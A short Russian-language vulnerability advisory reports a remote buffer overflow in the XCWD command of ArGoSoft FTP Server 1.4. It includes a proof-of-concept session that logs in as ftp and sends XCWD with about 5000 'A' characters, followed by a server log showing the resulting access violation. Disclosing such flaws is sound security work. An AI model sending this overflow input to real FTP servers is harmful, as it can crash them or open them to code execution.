Программа: ArGoSoft FTP Server 1.4 (1.4.1.1) 

Удаленное переполнение буфера обнаружено в ArGoSoft FTP Server. Удаленный атакующий может выполнить произвольный код на уязвимой системе.
Переполнение буфера обнаружено в команде XCWD. Пример: 

c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully **
XCWD AAAAAAA....(5000 times)
client closed connection.

В логах сервера можно увидеть что то типа такого: 

9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии